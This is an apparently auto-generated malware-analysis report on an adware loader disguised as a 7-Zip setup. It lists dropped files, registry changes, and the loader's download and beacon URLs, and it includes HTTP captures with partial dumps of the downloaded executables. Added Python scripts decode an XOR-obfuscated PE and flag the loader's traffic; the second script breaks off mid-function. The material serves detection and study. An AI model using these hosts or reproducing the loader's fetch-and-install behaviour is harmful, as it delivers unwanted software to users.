not-a-virus:AdWare.Win32.AdLoad.cbys (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 7ed96b6b6716f335a2a846ae95c66e6d
SHA1: 1f3107af9690e39f82099b7aa7fb66888dfb0eb1
SHA256: e22a92221a93094ad747337b5f817c8d1d4b5760bd5decc9538a7ce1207e765c
SSDeep: 49152:B1nULKB0btfWI7RsNa4gYAOZc4jlHKwF2t IK2/TaLBp4EU:BdtqsI7RsNa4sOZc4jlHKwk/U/U
Size: 2185519 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXP SP3 32-bit
Summary: Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The not-a-virus creates the following process(es):
run-setup.exe:1336
%original file name%.exe:2016
SevenZip_Setup.exe:928
The not-a-virus injects its code into the following process(es): none; no process injection was observed.
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process run-setup.exe:1336 makes changes in the file system.
The not-a-virus creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SevenZip_Setup.exe (40528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
The not-a-virus deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1.tmp (0 bytes)
No file creation, modification or deletion was recorded for the process %original file name%.exe:2016.
The process SevenZip_Setup.exe:928 makes changes in the file system.
The not-a-virus creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\timestamp[1].htm (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@secure.oi-installer5[1].txt (225 bytes)
Registry activity
The process run-setup.exe:1336 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry (the Cryptography\RNG "Seed" and MountPoints2 "BaseClass" entries below are routine side effects of CryptoAPI use and of Explorer drive enumeration, not persistence or configuration changes):
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 4F 43 35 D5 76 4E FB 22 20 1F 38 84 F0 7E FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:2016 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AF DB 99 FF 47 22 4A 03 B7 FD 4A B3 0E B7 BD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"run-setup.exe" = "run-setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The not-a-virus sets the IE Local intranet zone option "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
It sets the option "Include all network paths (UNCs)":
"UNCAsIntranet" = "1"
It sets the option "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
Note: these three values match the Windows XP / Internet Explorer defaults for the Local intranet zone and are written when a process first initializes WinINet in a user profile; they do not widen the zone beyond its default, so they should not be read as deliberate tampering.
The process SevenZip_Setup.exe:928 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 26 87 27 30 D3 56 64 D0 78 42 19 EC 73 DE 63"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The not-a-virus sets the IE Local intranet zone option "Include all network paths (UNCs)":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It sets the option "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It sets the option "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The not-a-virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Note: taken together with "MigrateProxy" = "1", "SavedLegacySettings" and the Content.IE5 cache-path values above, this is the one-time proxy and cache initialization that WinINet performs on first use in a fresh user profile (SevenZip_Setup.exe imports InternetOpenUrlA from WININET.dll, as the strings dump below shows). It is sandbox noise rather than a deliberate downgrade of the proxy or zone configuration.
Dropped PE files
MD5 | File path |
---|---|
b9794225748afb2525ffac7bbbc7a387 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SevenZip_Setup.exe |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
run-setup.exe:1336
%original file name%.exe:2016
SevenZip_Setup.exe:928
- Delete the original not-a-virus file.
- Delete or disinfect the following files created/modified by the not-a-virus:
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SevenZip_Setup.exe (40528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\timestamp[1].htm (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@secure.oi-installer5[1].txt (225 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
.rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
.data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
.CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
.rsrc | 192512 | 16656 | 16896 | 3.23905 | aa3a7d7ff24a928d00c7a73daacad998 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 439
01d8f21bdcf3f33cfd44b21cda45bbe1
080d7e74c49edc85c7f6ccf3d8616611
aaf4423dd074b8106e305632e6d64be2
65e4280f1ded384038fd30f88508d4e0
8a1b30a4c3845736d382278d30db1f66
3a154551bb5e5badfa1407a16c1444e9
9cbc3bd4f3109115c31cb030a37fc779
b35b2a682bd0b6418f0833a4a146fc3a
6743bd9e045b6ac6552dc0988afb1040
6a1633a9f055b93be88515fc88471c3c
bcb62e2c0201537a919a023fd8bd0c76
15d26afe16056a0c1e451902f8031d80
871e7d52b5615add0aaee0566123ee42
eb108dd5a482222f471803126004c75d
62b772f959ee84a244a1ebca4734a15c
8f16619a1e9f5140e494bf8047ccef14
23865ff029e65fae0db1f73c2df34b85
c0337f81961e826cdca238240015f9b0
abfce0d030f822bd164fcd00d6a59027
7a4fb066dec36bc6b6d9c138c197daf3
ca1f33580de7375b728d44371a497764
cd62699f7fd3baec87754c4004f891f9
3493e993a11d908fdd1143035cc9ab35
7c094695a717c8550be437979bd412bb
fdce746cd7ec071713f57ed7918b2a54
Network Activity
URLs
URL | IP |
---|---|
hxxp://54.235.251.129/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& | |
hxxp://54.235.251.129/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E | |
hxxp://imp.oi-imp4.com/impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=6&referrer=844 | 54.243.212.97 |
hxxp://imp.oi-imp4.com/impression.do/?event=loader_start&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1 | 54.243.212.97 |
hxxp://54.235.251.129/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) | |
hxxp://imp.oi-imp4.com/impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=1013760&referrer=5266 | 54.243.212.97 |
hxxp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) | |
hxxp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& | |
hxxp://secure.oi-installer5.com/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) HTTP/1.1
User-Agent: d
Host: secure.oi-installer5.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1013760
Content-Type: application/octet-stream
Expires: -1
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SevenZip_Setup.exe
Access-Control-Allow-Origin: *
Set-Cookie: wakenet=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910; expires=Mon, 15-Dec-2014 12:43:00 GMT; path=/
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
..x....ABAAAEAAA..AA.AAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAO^.OA.H.`.@..`.)(2a13.&3 ,a" //.5a#$a34/a(/a...a,.%$oLLKeAAAAAAAb).t&H.'&H.'&H.'/0]'*H.'..H''H.'8.K'9H.'8.]'.H.'&H.'.J.'/0M'.H.'8.Z'.H.'8.J''H.'8.O''H.'.(")&H.'AAAAAAAA..AA.@DAu-..AAAAAAAA.AC@J@HAAiHAA.GAAAAA..GAAQAAA.HAAA.AAQAAACAADAAAAAAADAAAAAAAAAQAAEAA.rQACA..AAQAAQAAAAQAAQAAAAAAQAAAAAAAAAAA..JA.@AAA!MAQ.CAAAAAAAAAAAAAAAAAAANA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI.KA.AAAAAAAAAAAA.HA.FAAE.JA.AAAAAAAAAAAAAAAAAAAo5$95AAAhgHAAQAAAiHAAEAAAAAAAAAAAAAAaAA!o3% 5 AAY.CAA.HAA.CAAmHAAAAAAAAAAAAA.AA.o% 5 AAA..AAA.JAAyAAA.JAAAAAAAAAAAAA.AA.o323"AAAQ.CAA!MAA.CAA.JAAAAAAAAAAAAA.AA.o3$-."AA%.AAAANAA.AAA.OAAAAAAAAAAAAA.AA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..M....N.Q...>K.@.Q.....E..@...A...GA....G...A...GA..eI@5F....EA.....EA....4U.4Q.4M.4I...GA..I..Q......4U.4Q.4M.4I...GA..I..Q.......Q........qIA....I...........EA.........A4e A.....qIA..A4L.D...A....A.G.....qIA.G.......... A.....qIA..E...2E...E.....qIA........... A.....qIA..E..7H...2E...E.6E..Z......b...qIA.......@...A......sIA.G.bpIA.............eE....I.O.-.......EA.H..5P.......5I.Q @...S..H..5eIz0M2I..I.E..Cr...4Xy.U5U..qIAz1M2I..I.E..Cr...EA.@.r........Q.........I........I..........EA.....0e..I.$.
<<< skipped >>>
GET /o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& HTTP/1.0
Host: secure.oi-installer5.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 437104
Content-Type: application/octet-stream
Expires: -1
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SevenZip_Setup.exe
Access-Control-Allow-Origin: *
Set-Cookie: wakenet=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910; expires=Mon, 15-Dec-2014 12:42:56 GMT; path=/
Date: Sun, 14 Dec 2014 12:42:56 GMT
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).R.m.<.m.<.m.<.s...{.<.s.....<.d...j.<.m.=...<.s.....<.s...l.<.s...l.<.Richm.<.........PE..L....{.T.............................]............@.................................4.......................................D?..P........K..............p...........................................P...@............................................text............................... ..`.rdata..............................@..@.data...@9...P.......0..............@....rsrc....K.......L...J..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................U..j.h.|B.d.....P........UC.3..E.P.E.d.......d.......hx.B..M..n....E.....h..B..M..Z....E...E......}..u..E..E....M..M..E..h,.B..M..*....E...E......E......E......E........U.....U..M..g8..9E.......j..E.P..h...Q.M........`.....`.....\....E....\...P.M..T....E....h....%.....M...u?h0.B..U.R..$..........u.h4.B..M.Q..$..........t..E...E..E..V....}..~..M. M..M../h8.B..U.R..$..........t..M.....M....E...........U.;...B.tQ.E. E.P.M.Q.U.R.M........d........d....E...M..a....E...M..U....E..
<<< skipped >>>
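The two download responses above differ in a way the dump makes visible. The 437104-byte body (second exchange) begins with a plain MZ header and the DOS stub "This program cannot be run in DOS mode". The 1013760-byte body (first exchange, mode=dlshiftcombined) is served with the same Content-Type but its preview is a wall of "A" with the stub rendered as `.)(2a13.&3 ,a" //.5a#$a34/a(/a...a,.%$o`, which is exactly what "This program cannot be run in DOS mode." becomes when every byte is XORed with 0x41 ("A"; 0x00 ^ 0x41 is the "A" that fills the padding). The larger download is therefore a PE image obfuscated with a single-byte XOR key, which is also why the report's own PE-file scanner did not list it as a dropped executable. The following Python script is an added example, not part of the report or the loader's code; it brute-forces a single-byte key by requiring an MZ signature at offset 0 and the DOS stub text within the first 512 bytes, and it reproduces the report's dotted preview so the claim can be checked against the dump. The input it runs on is constructed inline (a minimal MZ header plus stub text, not a real executable).

```python
"""Recover a PE image hidden behind a single-byte XOR from an HTTP body.

Added example, not part of the Lavasoft report or the loader's code. The
sample bytes are CONSTRUCTED: a minimal MZ header plus the DOS-stub text,
not a real executable.
"""
from typing import Optional, Tuple

DOS_STUB = b"This program cannot be run in DOS mode"
MZ_HEADER = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_preview(data: bytes) -> str:
    """Render bytes the way the report's traffic dump does: 0x20-0x7E as-is, the rest as '.'."""
    return "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in data)


def find_xor_key(body: bytes, scan: int = 0x200) -> Optional[int]:
    """Return the single-byte key under which `body` becomes a PE image.

    A key qualifies only if it maps offset 0 to b"MZ" and reveals the DOS
    stub text somewhere in the first `scan` bytes. Key 0 means the body was
    already a plain PE; None means no single-byte key works.
    """
    head = body[:scan]
    if len(head) < 2:
        return None
    for key in range(256):
        if head[0] ^ key != 0x4D or head[1] ^ key != 0x5A:   # 'M', 'Z'
            continue
        if DOS_STUB in xor_bytes(head, key):
            return key
    return None


def recover_pe(body: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (key, decoded_body) or None when no single-byte key fits."""
    key = find_xor_key(body)
    if key is None:
        return None
    return key, xor_bytes(body, key)


def build_fake_pe() -> bytes:
    """Constructed stand-in for a download: MZ header, padding, DOS stub (not runnable)."""
    return MZ_HEADER + b"\x00" * (0x40 - len(MZ_HEADER)) + DOS_STUB + b".\r\r\n$" + b"\x00" * 16


if __name__ == "__main__":
    encoded = xor_bytes(build_fake_pe(), 0x41)
    print(printable_preview(encoded[:0x80]))      # compare with the report's dump
    key, decoded = recover_pe(encoded)
    print(f"key=0x{key:02x} starts_with_MZ={decoded[:2] == b'MZ'}")
```

On the real capture, feed `recover_pe` the raw response body from the pcap; a multi-byte or rolling key would return None here, at which point a frequency or known-plaintext attack against the DOS stub is the next step.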
GET /impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=6&referrer=844 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
GET /validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E HTTP/1.1
User-Agent: d
Host: secure.oi-installer5.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Date: Sun, 14 Dec 2014 12:42:59 GMT
Connection: close
Content-Length: 6
200 OK..
GET /impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=1013760&referrer=5266 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:05 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
GET /impression.do/?event=loader_start&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
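The IDS verdicts section lists no alerts for this traffic, so detection here has to come from the loader's own fingerprints: the hosts secure.oi-installer5.com and imp.oi-imp4.com (and the bare IPs 54.235.251.129 and 54.243.212.97), the user agents `d`, `download manager` and `NSISDL/1.2 (Mozilla)`, the `/impression.do/` and `/validate/timestamp` beacon paths, and the `/o/<campaign>/<name>.exe` download path. Two correlations in the traffic are worth keeping: the `wakenet=` cookie set by the server is the same GUID that appears as `user_id` in every impression and in the combined download URL, and the `page=` value of each `dl_d` impression equals the Content-Length of the response just received (6 for the timestamp check, 1013760 for the payload), i.e. the loader reports bytes downloaded. The following Python triage script is an added example, not part of the report; it applies those indicators to constructed proxy-log lines in a made-up `METHOD host target "user-agent"` layout (the space in the `useragent=` parameter is written as %20 so the target stays one token), flags the loader's requests, pulls the tracking fields and decodes `ts=` as UTC.

```python
"""Triage HTTP/proxy log lines for the wakenet / oi-installer loader traffic.

Added example, not part of the Lavasoft report. SAMPLE_LOG is CONSTRUCTED
from the requests in the Traffic section, in a made-up layout:
    METHOD host target "User-Agent"
"""
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Indicators lifted from the report's URL table and Traffic section.
LOADER_HOSTS = {
    "secure.oi-installer5.com", "imp.oi-imp4.com",
    "54.235.251.129", "54.243.212.97",
}
LOADER_AGENTS = {"d", "download manager", "NSISDL/1.2 (Mozilla)"}
BEACON_PATHS = ("/impression.do/", "/validate/timestamp")
PAYLOAD_PATH = re.compile(r"^/o/[^/]+/[^/?]+\.exe$")   # /o/<campaign>/<name>.exe

LINE = re.compile(r'^(?P<method>\S+) (?P<host>\S+) (?P<target>\S+) "(?P<ua>[^"]*)"$')

SAMPLE_LOG = """\
GET imp.oi-imp4.com /impression.do/?event=loader_start&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1 "download manager"
GET secure.oi-installer5.com /validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E "d"
GET imp.oi-imp4.com /impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=6&referrer=844 "download manager"
GET secure.oi-installer5.com /o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2%20(Mozilla) "d"
GET www.example.com /index.html "Mozilla/5.0"
"""


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse the constructed log layout; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return why a request looks like loader traffic, or None if it does not."""
    host, ua = entry["host"], entry["ua"]
    path = urlsplit(entry["target"]).path
    if host in LOADER_HOSTS and path.startswith(BEACON_PATHS):
        return "beacon"
    if host in LOADER_HOSTS and PAYLOAD_PATH.match(path):
        return "payload-download"
    if ua in LOADER_AGENTS:
        return "loader-user-agent"   # weaker signal: agent alone, host not yet known
    return None


def tracking_fields(entry: Dict[str, str]) -> Dict[str, str]:
    """Pull the campaign/tracking parameters; decode ts= as a UTC timestamp."""
    query = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    wanted = ("event", "user_id", "subid", "source", "adprovider", "page", "ts", "sig")
    fields = {k: query[k][0] for k in wanted if k in query}
    if fields.get("ts", "").isdigit():
        stamp = datetime.fromtimestamp(int(fields["ts"]), tz=timezone.utc)
        fields["ts_utc"] = stamp.isoformat()
    return fields


def triage(text: str) -> List[Dict[str, str]]:
    """Flag loader requests and attach their tracking fields."""
    hits = []
    for entry in parse_log(text):
        verdict = classify(entry)
        if verdict is not None:
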